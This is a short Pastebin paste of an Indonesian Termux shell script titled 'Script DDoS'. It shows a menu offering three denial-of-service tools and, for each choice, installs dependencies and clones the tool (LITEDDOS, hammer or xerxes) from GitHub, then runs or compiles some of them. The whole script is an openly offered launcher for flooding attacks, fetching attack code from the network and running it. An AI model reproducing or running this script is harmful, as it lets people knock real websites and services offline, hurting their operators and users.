Advertisement
Guest User

script DDOS

a guest
Dec 14th, 2018
605
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.33 KB | None | 0 0
  1. #week
  2. #dibuat penuh kasih dan sayang
  3.  
  4.  
  5. clear
  6.  
  7. blue='\033[34;1m'
  8.  
  9. green='\033[32;1m'
  10.  
  11. purple='\033[35;1m'
  12.  
  13. cyan='\033[36;1m'
  14.  
  15. red='\033[31;1m'
  16.  
  17. white='\033[37;1m'
  18.  
  19. yellow='\033[33;1m'
  20.  
  21. echo "\033[33;1m Script DDoS By yoGaming"
  22.  
  23. echo "\033[31;1m___________________________________________"
  24.  
  25. echo "\033[33;1mTahun dibuat:10 - 12 - 2018"
  26.  
  27. echo "\033[33;1mJudul:Script Ddos Termux"
  28.  
  29. echo "\033[33;1mVERSION:1"
  30.  
  31. echo "\033[31;1m___________________________________________"
  32.  
  33. echo ""
  34.  
  35. echo $green"1).Ddos attack liteddos"
  36.  
  37. echo $green"2).Ddos attack hammer"
  38.  
  39. echo $green"3).Ddos attack xerxes"
  40.  
  41. echo ""
  42.  
  43. read -p"Silahkan Pilih==>> " bos;
  44.  
  45.  
  46. if [ $bos = 1 ] || [ $bos = 1 ]
  47.  
  48. then
  49.  
  50. clear
  51.  
  52. figlet Tunggu...|lolcat
  53.  
  54. apt update
  55.  
  56. apt upgrade
  57.  
  58. pkg install git
  59.  
  60. pkg install python2
  61.  
  62. git clone https://github.com/4L13199/LITEDDOS
  63.  
  64. cd LITEDDOS
  65.  
  66. fi
  67.  
  68.  
  69. if [ $bos = 2 ] || [ $bos = 2 ]
  70.  
  71. then
  72.  
  73. clear
  74.  
  75. figlet Tunggu...|lolcat
  76.  
  77. pkg update
  78.  
  79. pkg upgrade
  80.  
  81. pkg install python
  82.  
  83. pkg install git
  84.  
  85. git clone https://github.com/cyweb/hammer
  86.  
  87. cd hammer
  88.  
  89. python hammer.py
  90.  
  91. fi
  92.  
  93.  
  94. if [ $bos = 3 ] || [ $bos = 3 ]
  95.  
  96. then
  97.  
  98. clear
  99.  
  100. figlet Tunggu...|lolcat
  101.  
  102. apt-get install git
  103.  
  104. git clone https://github.com/zanyarjamal/xerxes
  105.  
  106. apt-get install clang
  107.  
  108. cd /xerxes/
  109.  
  110. gcc xerxes.c -o xerxes
  111.  
  112. fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement